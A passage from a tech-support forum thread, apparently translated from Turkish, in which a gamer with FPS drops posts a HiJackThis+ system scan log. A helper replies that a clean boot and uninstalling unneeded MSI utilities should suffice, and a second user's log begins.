O23 - Driver R3: Service for Realtek HD Audio (WDM) - (IntcAzAudAddService) - C:\WINDOWS\system32\drivers\RTKVHD64.sys (sign: 'Realtek Semiconductor Corp.')
O23 - Driver S3: ___ Windows 10 64 Bit için Intel(R) Wireless Bağdaştırıcı Sürücüsü  - (Netwtw12) - C:\WINDOWS\System32\DriverStore\FileRepository\netwtw6e.inf_amd64_9e7b9e1ba7e74592\Netwtw12.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver S3: igfxn - C:\WINDOWS\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_4ec1a03daa49235f\igdkmdn64.sys (sign: 'Intel Corporation')
O23 - Driver S3: Intel(R) Serial IO GPIO Controller Driver - (iaLPSSi_GPIO) - C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys (sign: 'Intel Corporation - Client Components Group')
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service:  'Netwtw12'
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service:  'Netwtw14'
O26 - Office Addin: HKLM\..\MicrosoftDataStreamerforExcel - (Microsoft Data Streamer for Excel) -> C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.vsto (not signed - no company - A9DA61511D2073E5B80ED742394B35C61D96DE3A)
O26 - Office Addin: HKLM\..\NativeShim - (Inquire) -> (no file)


--
End of file - Time spent: 20,4 sec. - 45262 bytes, CRC32: FFFFFFFF. Sign: ۄ

I get FPS drops while playing FPS games. Even though my graphics card and CPU are quite good, I haven't been able to solve this. I'm waiting for your help; thank you for your effort. Also, if there is something I need to fix, how do I do it? I'll be shutting down the computer after posting this here? Thanks.
Code:
Logfile of HiJackThis+ build 2025-01-16 Beta v.3.4.0.17

Platform:  x64 Windows 11 (Home), 10.0.26100.3194 (ReleaseId: 2009, 24H2), Service Pack: 0
Time:      19.02.2025 - 03:31 (UTC+03:00)
Language:  OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Memory:    27,63 GiB Free / 32. Loading RAM (13 %), CPU (2 %)
Disk C:    820,13 GiB Free / 953 (SSD, GPT)
Elevated:  Yes
Ran by:    Cihan    (group: Administrators; type: Microsoft) on CANAVAR, FirstRun: yes

Chrome:  132.0.6834.197
Internet Explorer: 11.0.26100.1882
Default: "C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument %1 (Google Chrome)

Boot mode: Normal (Secure Boot: On) (Code Integrity: On)

Running processes:
Number | Path
   1  C:\Program Files (x86)\Feature Manager\Feature Manager Service.exe
   1  C:\Program Files (x86)\Feature Manager\Feature_Manager.exe
   1  C:\Program Files (x86)\Feature Manager\MSIAPService.exe
   1  C:\Program Files (x86)\Feature Manager\OmApSvcBroker.exe
   1  C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
   1  C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2506.4.0_x64__cv1g1gvanyjgm\WhatsApp.exe
   1  C:\Program Files\WindowsApps\AppUp.IntelGraphicsExperience_1.100.5688.0_x64__8j3eq9eme6ctt\IGCC.exe
   1  C:\Program Files\WindowsApps\Microsoft.YourPhone_1.25011.56.0_x64__8wekyb3d8bbwe\PhoneExperienceHost.exe
   1  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpDefenderCoreService.exe
   1  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MsMpEng.exe
   1  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\NisSrv.exe
   1  C:\Users\Cihan\Desktop\HiJackThis\HiJackThis.exe
   1  C:\Windows\explorer.exe
   1  C:\Windows\System32\AggregatorHost.exe
   1  C:\Windows\System32\audiodg.exe
   2  C:\Windows\System32\csrss.exe
   1  C:\Windows\System32\ctfmon.exe
   1  C:\Windows\System32\dasHost.exe
   2  C:\Windows\System32\dllhost.exe
   1  C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_2c7653f29a37d3f4\OneApp.IGCC.WinService.exe
   1  C:\Windows\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_b25cc008923a9297\ipf_helper.exe
   1  C:\Windows\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_b25cc008923a9297\ipf_uf.exe
   1  C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_d51901c26227fb29\WMIRegistrationService.exe
   2  C:\Windows\System32\DriverStore\FileRepository\nvmii.inf_amd64_085de2d4b49d7707\Display.NvContainer\NVDisplay.Container.exe
   1  C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_a9e9122da4b4db5b\RtkAudUService64.exe
   1  C:\Windows\System32\dwm.exe
   2  C:\Windows\System32\fontdrvhost.exe
   1  C:\Windows\System32\LsaIso.exe
   1  C:\Windows\System32\lsass.exe
   1  C:\Windows\System32\NgcIso.exe
   5  C:\Windows\System32\RuntimeBroker.exe
   1  C:\Windows\System32\SearchIndexer.exe
   1  C:\Windows\System32\SearchProtocolHost.exe
   1  C:\Windows\System32\services.exe
   1  C:\Windows\System32\ShellHost.exe
   1  C:\Windows\System32\sihost.exe
   1  C:\Windows\System32\smartscreen.exe
   1  C:\Windows\System32\smss.exe
   1  C:\Windows\System32\spoolsv.exe
  77  C:\Windows\System32\svchost.exe
   2  C:\Windows\System32\taskhostw.exe
   1  C:\Windows\System32\wbem\WMIADAP.exe
   1  C:\Windows\System32\wbem\WmiPrvSE.exe
   1  C:\Windows\System32\wininit.exe
   1  C:\Windows\System32\winlogon.exe
   1  C:\Windows\System32\wlanext.exe
   3  C:\Windows\System32\WUDFHost.exe
   1  C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
   1  C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\CHXSmartScreen.exe
   1  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
   1  C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
   1  C:\Windows\SysWOW64\MSIService.exe

O4 - ActiveSetup: HKLM\..\{8A69D345-D564-463c-AFF1-A69D9E530F96}: [StubPath] = C:\Program Files\Google\Chrome\Application\132.0.6834.197\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level --channel=stable (sign: 'Google LLC')
O4 - HKCU\..\StartupApproved\Run: [MicrosoftEdgeAutoLaunch_2290CA5D22A0CF51FC792BE002BC6E36] = C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --win-session-start (2024/11/28) (sign: 'Microsoft')
O4 - HKCU\..\StartupApproved\Run: [Steam] = C:\Program Files (x86)\Steam\steam.exe -silent (2024/11/28) (sign: 'Valve Corp.')
O4 - HKCU\..\StartupApproved\StartupFolder: C:\Users\Cihan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote'a Gönder.lnk    ->    C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (file missing) /tsr (2025/02/04)
O4 - HKLM\..\StartupApproved\Run: [RtkAudUService] = C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_a9e9122da4b4db5b\RtkAudUService64.exe -background (2024/12/08) (sign: 'Realtek Semiconductor Corp.')
O4 - HKLM\..\StartupApproved\Run: [SecurityHealth] = C:\WINDOWS\system32\SecurityHealthSystray.exe (2024/12/08) (sign: 'Microsoft')
O4 - HKLM\..\StartupApproved\Run32: [Keyboard Lighting Manager] = C:\Program Files (x86)\Keyboard Lighting Manager\Keyboard Lighting Manager.exe -systemstartup (2024/11/28) (sign: 'Micro-Star International CO., LTD.')
O4 - HKU\S-1-5-19\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Local service') (sign: 'Microsoft')
O4 - HKU\S-1-5-20\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Network service') (sign: 'Microsoft')
O7 - KnownFolder: C:\Users\Cihan\Desktop\Downloads (folder missing)
O7 - KnownFolder: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, {374DE290-123F-4565-9164-39C4925E467B} = C:\Users\Cihan\Desktop\Downloads
O7 - KnownFolder: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, {374DE290-123F-4565-9164-39C4925E467B} = %USERPROFILE%\Desktop\Downloads
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Se&nd to OneNote: (default) = C:\Program Files\Microsoft Office\root\Office16\ONBttnIE.dll (file missing)
O17 - DHCP DNS 1: 178.233.140.147
O17 - DHCP DNS 2: 46.196.235.228
O17 - DHCP DNS 3: 46.196.235.35
O22 - Tasks: (disabled) \Microsoft\Office\Office Apps Prewarm - C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe /prewarm (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Office\Office Apps Prewarm Recurring - C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe /prewarm (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical - {613FBA38-A3DF-4AB8-9674-5604984A299A},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical - {DE434264-8FE9-4C0B-A83B-89EBEEBFF78E},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Flighting\FeatureConfig\BootstrapUsageDataReporting - {D759C938-B375-41CB-A2A2-E6D866A767F4} - C:\Windows\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\DetectHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},DetectHardwareChange - C:\Windows\System32\Autopilot.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\RemediateHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},RemediateHardwareChange - C:\Windows\System32\Autopilot.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\MdmDiagnosticsCleanup - C:\WINDOWS\system32\MdmDiagnosticsTool.exe /clean (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Servicing\OOBEFodSetup - C:\WINDOWS\system32\OOBEFodSetup.exe (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\SharedPC\Account Cleanup - {7750564D-D61C-4557-8A9D-7DF56BDCFF96} - C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Shell\ThemeAssetTask_SyncFODState - {3BC5DD7D-EA3B-428C-B9B6-0723DB6A1057} - C:\Windows\System32\Windows.UI.Immersive.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Office\Office Performance Monitor - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\operfmon.exe (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aemarebackup.dll -f:BackupMareData (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser - C:\WINDOWS\system32\sc.exe start InventorySvc (sign: '')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser Exp - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun express (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\SdbinstMergeDbTask - C:\WINDOWS\system32\sdbinst.exe -mm (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Sustainability\SustainabilityTelemetry - {6EE41D75-D091-4FB7-9AD5-018760DD25D4} - C:\WINDOWS\system32\EcoScoreTask.dll (sign: 'Microsoft')
O22 - Tasks: \GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem132.0.6833.0{F60DA91C-C96E-4948-A6CF-2973F5BE7F26} - C:\Program Files (x86)\Google\GoogleUpdater\132.0.6833.0\updater.exe --wake --system (sign: 'Google LLC')
O22 - Tasks: \GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem134.0.6985.0{1653A49C-BDC2-4859-A2B6-93F49F39DCAD} - C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\updater.exe --wake --system (sign: 'Google LLC')
O22 - Tasks: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 - {84F0FAE1-C27B-4F6F-807B-28CF6F96287D},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 - {429BC048-379E-45E0-80E4-EB1977941B5C},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Diagnosis\UnexpectedCodepath - C:\WINDOWS\system32\UCConfigTask.exe (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Flighting\FeatureConfig\ReconcileConfigs - {15F5ECE1-4550-4A92-8E26-984FD1DA54FA} - C:\WINDOWS\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Flighting\FeatureConfig\UsageDataReceiver - {D4C0420F-76BD-4F66-A91F-918A93ABEBEB} - C:\Windows\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemoteMouseSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemoteMouseSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemotePenSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemotePenSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemoteTouchpadSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemoteTouchpadSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Network Connectivity Status Indicator\NcsiIdentifyUserProxies - {706B965A-8308-4CD4-9900-87C2D79C121B} - C:\Windows\System32\netprofm.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\PerformanceTrace\RequestTrace - {9EFEB182-2EE3-4AF9-AFFA-521410D110D1} - C:\WINDOWS\system32\PerformanceTraceHandler.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\ReFsDedupSvc\Initialization - {DCFF735B-64F7-45F3-B39C-6C66BBE2120F} - C:\WINDOWS\System32\ReFsDedupSvc.exe (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Sustainability\PowerGridForecastTask - {251E5B1F-E370-4E12-B5BD-B7AD2A8EE810} - C:\WINDOWS\system32\PowerGridForecastTask.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\TPM\Tpm-PreAttestationHealthCheck - {5014B7C8-934E-4262-9816-887FA745A6C4},TpmPreAttestationHealthCheck - C:\WINDOWS\system32\TpmTasks.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\UIEOrchestrator - C:\WINDOWS\system32\UIEOrchestrator.exe /SendHeartbeat (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker - C:\WINDOWS\system32\MusNotification.exe (file missing)
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\UUS Failover Task - C:\WINDOWS\System32\MLEngineStub.exe HandleUusFailoverEvaluationSignalFromWnf (sign: 'Microsoft')
O22 - Tasks: Feature Manager - C:\Program Files (x86)\Feature Manager\Feature_Manager.exe (sign: 'Micro-Star International CO., LTD.')
O22 - Tasks: OmApSvcBroker - C:\Program Files (x86)\Feature Manager\OmApSvcBroker.exe (sign: 'Micro-Star International CO., LTD.')
O22 - Tasks: ZoomUpdateTaskUser-S-1-5-21-3642336869-4069828061-3843680770-1001 - C:\Users\Cihan\AppData\Roaming\Zoom\bin\Zoom.exe --action=UpdateSchedule (sign: 'Zoom Video Communications, Inc.')
O23 - Service R2: Intel(R) Graphics Command Center Service - (igccservice) - C:\WINDOWS\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_2c7653f29a37d3f4\OneApp.IGCC.WinService.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Innovation Platform Framework Service - (ipfsvc) - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_b25cc008923a9297\ipf_uf.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Management Engine WMI Provider Registration - (WMIRegistrationService) - C:\WINDOWS\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_d51901c26227fb29\WMIRegistrationService.exe (sign: 'Intel Corporation')
O23 - Service R2: Micro Star SCM - C:\WINDOWS\SysWOW64\MSIService.exe (sign: 'Micro-Star International CO., LTD.')
O23 - Service R2: Microsoft Defender Çekirdek Hizmeti - (MDCoreSvc) - C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpDefenderCoreService.exe (sign: 'Microsoft')
O23 - Service R2: MSI Foundation Service - C:\Program Files (x86)\Feature Manager\MSIAPService.exe (sign: 'Micro-Star International CO., LTD.')
O23 - Service R2: NVIDIA Display Container LS - (NVDisplay.ContainerLocalSystem) - C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_085de2d4b49d7707\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_085de2d4b49d7707\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem /ert (sign: 'NVIDIA Corporation')
O23 - Service R2: Realtek Audio Universal Service - (RtkAudioUniversalService) - C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_a9e9122da4b4db5b\RtkAudUService64.exe (sign: 'Realtek Semiconductor Corp.')
O23 - Service S2: Google Güncelleyici Dahili Hizmeti (GoogleUpdaterInternalService134.0.6985.0) - (GoogleUpdaterInternalService134.0.6985.0) - C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\updater.exe --system --windows-service --service=update-internal (sign: 'Google LLC')
O23 - Service S2: Google Güncelleyici Hizmeti (GoogleUpdaterService134.0.6985.0) - (GoogleUpdaterService134.0.6985.0) - C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\updater.exe --system --windows-service --service=update (sign: 'Google LLC')
O23 - Service S3: FACEITService - C:\Program Files\FACEIT AC\faceitservice.exe (sign: 'ESL FACEIT Group Ltd.')
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files\Google\Chrome\Application\132.0.6834.197\elevation_service.exe (sign: 'Google LLC')
O23 - Service S3: NVIDIA FrameView SDK service - (FvSvc) - C:\Program Files\NVIDIA Corporation\FrameViewSDK\nvfvsdksvc_x64.exe -service (sign: 'NVIDIA Corporation')
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService (sign: 'Valve Corp.')
O23 - Driver R1: FACEIT - C:\Program Files\FACEIT AC\FACEIT_AC.sys (sign: 'Microsoft' - no company)
O23 - Driver R3: ___ Windows 10 64 Bit için Intel(R) Wireless Bağdaştırıcı Sürücüsü  - (Netwtw14) - C:\WINDOWS\System32\DriverStore\FileRepository\netwtw6e.inf_amd64_477c028818b7a796\Netwtw14.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) GNA Scoring Accelerator service - (IntelGNA) - C:\WINDOWS\System32\DriverStore\FileRepository\gna.inf_amd64_04d4eecc5838a558\gna.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) HID Event Filter - (HidEventFilter) - C:\WINDOWS\System32\DriverStore\FileRepository\hideventfilter.inf_amd64_8b4344345b8897be\HidEventFilter.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Management Engine Interface  - (MEIx64) - C:\WINDOWS\System32\DriverStore\FileRepository\heci.inf_amd64_6b6e8cc42a3d1f09\x64\TeeDriverW10x64.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Serial IO GPIO Driver v2 - (iaLPSS2_GPIO2_ADL) - C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_gpio2_adl.inf_amd64_302e75596cffa74a\iaLPSS2_GPIO2_ADL.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Serial IO I2C Driver v2 - (iaLPSS2_I2C_ADL) - C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_i2c_adl.inf_amd64_e736c048ca307ed2\iaLPSS2_I2C_ADL.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Wireless Bluetooth(R) - (ibtusb) - C:\WINDOWS\System32\DriverStore\FileRepository\ibtusb.inf_amd64_4d48e97cd3587c52\ibtusb.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology BUS - (IntcAudioBus) - C:\WINDOWS\System32\DriverStore\FileRepository\intcaudiobus.inf_amd64_799c962c58e6bfeb\IntcAudioBus.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for Bluetooth® Audio - (IntcBTAu) - C:\WINDOWS\System32\DriverStore\FileRepository\intcbtau.inf_amd64_164a440e6b400316\IntcBTAu.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for Bluetooth® LE Audio - (IntcBtLE) - C:\WINDOWS\System32\DriverStore\FileRepository\intcbtle.inf_amd64_0c9aadaff32d0209\IntcBtLE.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for Digital Microphones - (IntcDMic) - C:\WINDOWS\System32\DriverStore\FileRepository\intcdmic.inf_amd64_acd402699ea3db34\IntcDMic.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for USB Audio - (IntcUSB) - C:\WINDOWS\System32\DriverStore\FileRepository\intcusb.inf_amd64_c2a06a639869c7cd\IntcUSB.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology OED - (IntcOED) - C:\WINDOWS\System32\DriverStore\FileRepository\intcoed.inf_amd64_6f0a892deb241071\IntcOED.sys (sign: 'Intel Corporation')
O23 - Driver R3: ipf_acpi - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_acpi.inf_amd64_0bbfb278918dfdd5\ipf_acpi.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: ipf_cpu - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_b25cc008923a9297\ipf_cpu.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: ipf_lf - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_b25cc008923a9297\ipf_lf.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: nvlddmkm - C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_085de2d4b49d7707\nvlddmkm.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: NVPCF Service - (nvpcf) - C:\WINDOWS\System32\drivers\nvpcf.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: Realtek NetAdapter Driver - (rt68cx21) - C:\WINDOWS\System32\DriverStore\FileRepository\rt68cx21x64.inf_amd64_81b332badcdcaabe\rt68cx21x64.sys (sign: 'Realtek Semiconductor Corp.')
O23 - Driver R3: Service for NVIDIA High Definition Audio Driver - (NVHDA) - C:\WINDOWS\system32\drivers\nvhda64v.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: Service for Realtek HD Audio (WDM) - (IntcAzAudAddService) - C:\WINDOWS\system32\drivers\RTKVHD64.sys (sign: 'Realtek Semiconductor Corp.')
O23 - Driver S3: ___ Windows 10 64 Bit için Intel(R) Wireless Bağdaştırıcı Sürücüsü  - (Netwtw12) - C:\WINDOWS\System32\DriverStore\FileRepository\netwtw6e.inf_amd64_9e7b9e1ba7e74592\Netwtw12.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver S3: igfxn - C:\WINDOWS\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_4ec1a03daa49235f\igdkmdn64.sys (sign: 'Intel Corporation')
O23 - Driver S3: Intel(R) Serial IO GPIO Controller Driver - (iaLPSSi_GPIO) - C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys (sign: 'Intel Corporation - Client Components Group')
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service:  'Netwtw12'
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service:  'Netwtw14'
O26 - Office Addin: HKLM\..\MicrosoftDataStreamerforExcel - (Microsoft Data Streamer for Excel) -> C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.vsto (not signed - no company - A9DA61511D2073E5B80ED742394B35C61D96DE3A)
O26 - Office Addin: HKLM\..\NativeShim - (Inquire) -> (no file)


--
End of file - Time spent: 20,4 sec. - 45262 bytes, CRC32: FFFFFFFF. Sign: ۄ
@Murat5038
I'll shut down the computer after posting this here? Thanks.
Just performing a clean boot and uninstalling the unnecessary MSI software is enough. Other than that, I don't see anything that would affect it.
 
@Murat5038
 
Code:
Logfile of HiJackThis+ build 2025-01-16 Beta v.3.4.0.17

Platform: x64 Windows 11 (Home Single Language), 10.0.26100.3476 (ReleaseId: 2009, 24H2), Service Pack: 0
Time: 15.03.2025 - 16:56 (UTC+03:00)
Language: OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Memory: 6,32 GiB Free / 16. Loading RAM (59 %), CPU (36 %)
Disk C: 68,32 GiB Free / 476 (SSD, GPT)
Elevated: Yes.
Ran by: eymen (group: Administrators; type: Microsoft) on DESKTOP-JRKUDT8, FirstRun: yes.

Chrome: 134.0.6998.89
Internet Explorer: 11.0.26100.1882
Default: "C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument %1 (Google Chrome)

Boot mode: Normal (Secure Boot: On) (Code Integrity: On)

Running processes:
Number | Path.
 1 C:\GHelper.exe
 4 C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe
 1 C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe
 1 C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe
 1 C:\Program Files (x86)\ASUS\ArmouryDevice\dll\SwAgent\ArmourySwAgent.exe
 1 C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe
 1 C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
 1 C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
 1 C:\Program Files (x86)\Common Files\Steam\SteamService.exe
 2 C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe
 1 C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
 2 C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.20\avp.exe
 1 C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.20\avpui.exe
 1 C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.20\plugins_nms.exe
 1 C:\Program Files (x86)\LightingService\LightingService.exe
 7 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
 7 C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.92\msedgewebview2.exe
 8 C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe
 1 C:\Program Files (x86)\Steam\steam.exe
